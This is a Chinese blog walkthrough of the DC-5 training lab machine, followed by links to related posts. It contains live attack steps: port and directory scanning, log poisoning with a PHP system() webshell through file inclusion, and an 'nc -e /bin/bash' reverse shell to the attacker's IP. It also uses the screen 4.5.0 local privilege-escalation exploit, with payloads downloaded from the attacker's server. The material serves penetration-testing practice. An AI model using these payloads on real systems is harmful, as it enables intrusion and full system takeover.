DC-5通关教程

最新推荐文章于 2024-10-30 13:57:55 发布
最新推荐文章于 2024-10-30 13:57:55 发布
阅读量1k 收藏 25
点赞数 13
文章标签: 网络安全 linux web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/138135453
版权
本文详细描述了黑客通过主机扫描、端口探测、文件包含攻击、Nginx日志利用、反弹shell及Linux提权等步骤,逐步渗透进目标系统的全过程,展示了渗透测试的技术手段。
摘要由CSDN通过智能技术生成

一. 信息收集

1. 主机扫描

arp -scan -l

2.网段扫描

找到相应的ip

nmap -sP 192.168.83.1/24

拿到了靶机的ip

靶机ip是:

192.168.83.150

攻击机的ip是:

192.168.83.136

端口和服务是对应关系的根据计算机网络的应用层协议

3.扫描端口

nmap -p 1-65535 -A 192.168.83.150

看到了111端口tcp协议和80端口--http服务打开

火狐浏览器打开网页,用自带的扩展“wappalyzer”查看页面的一些信息,cms,js版本,

发现只有Nginx(中间件)

4.目录扫描

dirsearch -u 192.168.83.150 -e * -i 200

看到了footer.php是隐藏的查看一下

刷新后页面内容会发生变化,可能存在文件包涵,这个是一个突破口

二. 渗透过程

1. 寻找包含文件的参数

为了验证文件包含的猜想,这里利用burpsuite爆破配合参数fuzz拆解

fuzz链接,文件上传的参数

在GitHub下载,用于后面的爆破

Paramdict参数字典

爆破到了上传的参数file

2. Nginx日志文件包含

先查看一下Nginx的配置,构造payload

http://ip/thankyou.php?file=/etc/nginx/nginx.conf

Ctrl+u查看源代码

access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log;

这两句话说明我们可以查看你日志文件

开启了访问日志(access_log)和错误日志(error_log),这里我们看一下错误日志

记录我们爆破失败的日志记录

hankyou.php?mumua=<?php system($_GET[1])?>

这里记得用burpsuite重复器抓包发送,用浏览器传参会自动将<>转换成URL编码导致php执行失败

这样我们可以通过get--1上传参数了

接着尝试一下命令执行

/thankyou.php?file=/var/log/nginx/error.log&1=whoami

看到了权限说明我们可以进行任意代码攻击

3. 反弹shell 

nc -lvvp 6666

构造payload

/thankyou.php?file=/var/log/nginx/error.log&1=nc -e /bin/bash 192.168.83.136 6666

注意是在重发器哪里执行的

反弹shell成功,升级为交互shell

python -c 'import pty; pty.spawn("/bin/bash")'

4. Linux提权

find / -perm -4000 -print 2>/dev/null

这个命令是在Unix或Linux系统中使用find命令来搜索具有特定权限的文件。具体来说,这个命令在文件系统的根目录(/)开始,查找所有设置了setuid位(set user ID on execution)的文件,并将这些文件的路径打印出来

可以看到有两个特殊的命令,exim之前在DC-4的时候试过了,不能完全得到root权限,这里用screen作为突破口,用searchsploit工具搜索一下漏洞

searchsploit screen 4

cp  /usr/share/exploitdb/exploits/linux/local/41154.sh ./

拷贝到kali主机中

查看41154.sh的文件内容

要编辑三个文件

5.开启http服务

python -m http.server 8888

接下来,我们以文本的形式打开exp.sh文件(因为靶机没有对应的命令,只能手工提取命令了)

根据提示,在桌面创建两个c文件

保存之后,在桌面打开终端,用gcc编译c文件

gcc -fPIC -shared -ldl -o libhax.so libhax.c

gcc -o rootshell rootshell.c

编译完后,再将这两个c文件删掉,文本让我们用rm命令,我们也可以自己删,接着我们修改exp.sh文件内容

将1到36行的内容全部删除并保存,留下cd /etc后面的命令,接着在/tmp目录下载这三个文件(在靶机的shell命令里面操作)

cd /tmp

wget 192.168.83.136:8888/exp.sh

wget 192.168.83.136:8888/libhax.so

wget 192.168.83.136:8888/rootshell

文件下载完后,赋予exp文件权限并执行exp.sh

chmod 777 exp.sh

./exp.sh

还是这个老问题(好像是kali版本问题,看其他人的博客好像是更换kali版本问题就可以解决了)

吃饱饭,练球
关注
内网渗透DC-5靶场通关
qq_35664104的博客
10-12 2453
个人博客地址:点我 DC系列共9个靶场,本次来试玩一下一个 DC-5,只有一个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP DC-5: 192.168.31.107 Kali: 192.168.31.18 Win7: 192.168.31.168 信息搜集 首先是主机发现,得到靶机ip arp-scan -l 对其进行端口扫描,开放了80、111
DC系列靶机5通关教程
weixin_58954236的博客
09-17 257
信息收集主机发现 netdiscouver端口扫描 nmap目录爆破 dirsearch漏洞利用bp抓包分析数据包,测试到有文件包含漏洞木马上传,查看日志反弹shellpython交互shell。
DC-5靶机攻略
weixin_47311099的博客
07-16 787
DC-5靶机通关攻略 信息收集 主机发现 nmap -sP 192.168.64.0/24 -oN nmap_sp 目标主机ip地址为:192.168.64.129 端口扫描 nmap -A 192.168.64.129 -oN namp_a 发现80 访问80端口 发现只有Contact页面有用, 尝试提交内容 刷新发现底部时间变化 推测这里存在文件包含 目录扫描 御剑扫描 访问footer.php 刷新 确定thankyou.php包含了footer.php,存在文件包含,可以尝试文件
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 7406
DC-5靶机渗透测试详细教程
DC-4通关教程
m0_74402888的博客
04-24 2099
6默认的shell:这个字段指定了用户的默认shell,即用户登录后用来执行命令的程序。在Linux系统中,/etc/passwd是一个重要的系统用户配置文件,用于存储系统中所有用户的基本信息。在Linux中,/usr/bin目录主要用于存放用户可执行的二进制文件,即用户可以直接执行的程序。火狐浏览器打开网页,用自带的扩展“wappalyzer”查看页面的一些信息,cms,js版本,和php信息,发现没有可用的信息,5家目录:这个字段指定了用户的家目录,即用户登录后所处的目录。用户可以属于多个组。
DC-8通关教程
m0_74402888的博客
04-26 1159
SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限,若是对一些特殊命令设置了SUID,那么将会有被提权的风险。nid=1" --level=5 --risk=3 --batch --current-db //爆破当前数据库。测试发现是john的密码,在/user/login处登入,探索发现在WEBFORM处可以编辑并执行PHP代码。sudo是给某个用户或者组授予执行某些命令的权限,权限在人身上。SUID是给命令赋予root用户的权限,权限在命令上。
DC-2通关教程
2401_83876878的博客
09-26 1033
DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。5. 发现不能访问,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt。wpscan --url http://dc-2 --enumerate u 枚举用户。登录后台之后,我们看到flag2,我用的是jerry的账号。
Dc-2通关教程
2402_84645634的博客
09-29 821
DC-2从环境搭建到通关教程
DC-3通关教程
m0_74402888的博客
04-23 840
利用John(john 设置为使用特定的哈希格式进行破解,有多种方法可以做到对哈希类型进行识别)工具,对该密码进行爆破拆解。接着我们下载该压缩包并放到kali桌面里,解压该文件,然后在桌面开启http服务,将下载好的文件导入到DC-3靶机里。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。joomscan是一款开源的且针对joomla的扫描器,kali可以用命令。searchsploit是一款kali自带的搜索漏洞信息的模块。
2024年网安最新DC系列靶机1通关教程_dc1 靶机
2401_84298087的博客
05-01 294
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3070
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
WEB-CTF通关教程
m0_50098640的博客
08-01 601
信息泄露的第二关 进去页面如下 查看源代码发现后缀为.sql的文件。 看见这个文件思路就是把这个文件下载下来查看敏感数据。尝试在链接后直接加文件名,发现直接下载了我们的文件。 使用记事本打开文件,得到flag值。 暴力破解第二关 打开页面提示如下, 点击地址传送门得到如下链接 将链接的UID使用在线base64解码得到的结果如下 看到这明白了解这个题的思路,抓包爆破UID值。从T_1到T_5000,思路有了,可是具体爆破的时候不知道怎么爆破,等知道怎么解决这个问题了之后再来更。 xss第二关
【xss-labs靶场实战通关教程
AuroraMiraitowa的博客
03-09 1175
好吧,原来还有其他隐藏的传参方法,学到了,下次就一个个测,这里是get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type=“text”,构造payload。不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过,这里可以看到,Get传参的值,只插入了h2标签里头,额那下面的input标签啥东西,还隐藏掉了。
【智能交互】OPPO接入小布语音技能通关教程:个人开发者实现接口调用
C站全栈优质创作者、阿里云受邀博主专家,喜欢结识新伙伴寻找志同道合的朋友,欢迎一起探讨学习
07-19 3196
适用人群:本教程适合大赛接入小布语音技能的同学以及初次使用小布助手的开发者本篇文章是博主弄了多次测试才勉强弄明白的,OPPO的开发文档和没有没啥区别很多人会问:“为啥有更成熟的其他语音技能平台放着不用?答:“因为我在参加的比赛是由oppo主办方举办的,若要想进决赛,必须要接入OPPO开放平台”猜想测试部分和实际操作部分,请根据你的需要进行跳过选择。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8530
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux】操作系统初步理解与Linux指令入门
2303_80828380的博客
10-27 705
Ubuntu 22.04 server 64bit环境
【ShuQiHere】Linux 桌面环境:选择与定制指南 ️✨
ShuQIHere的博客
10-26 1256
Linux 桌面环境(Desktop Environment,简称 DE)是用户与操作系统交互的图形界面。它不仅决定了系统的外观和感觉,还影响着用户的工作效率和使用体验。无论你是新手还是资深用户,选择和定制适合自己的桌面环境都是提升 Linux 使用体验的重要一步。本文将带你全面了解 Linux 桌面环境的基本概念、常见类型、选择技巧以及定制方法。🚀
Linux tac命令‌
最新发布
weixin_37788102的博客
10-30 292
tac命令实际上是cat命令的一个变体,尽管它的功能相对简单,但在某些情况下非常有用。例如,当需要查看文件的最后一行(通常是标题或总结)时,使用tac命令可以避免滚动查看整个文件。此外,tac命令对于处理大型文件或需要快速定位文件末尾内容的情况非常有用‌。‌Linux tac命令‌是一个用于逆序显示文件内容的工具,其名称来源于“cat”的反向拼写。tac命令的基本功能是将文件的内容从最后一行开始输出,直到第一行结束,这与cat命令的功能相反,cat命令是从第一行开始输出直到最后一行。tac命令的基本用法。
VMware各版本下载的镜像站(含windows和linux)
王佐儿z的博客
10-27 351
转载地址。
DC-DC转换器MATLAB例程教程与应用
资源摘要信息:"DC-DC转换器是电力电子技术中一种重要的电源转换设备,其作用是在输入电压与输出电压之间进行能量的转换与调节。该转换过程通常涉及从一个直流电压源转换为另一个直流电压,但电压的大小和稳定性会...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值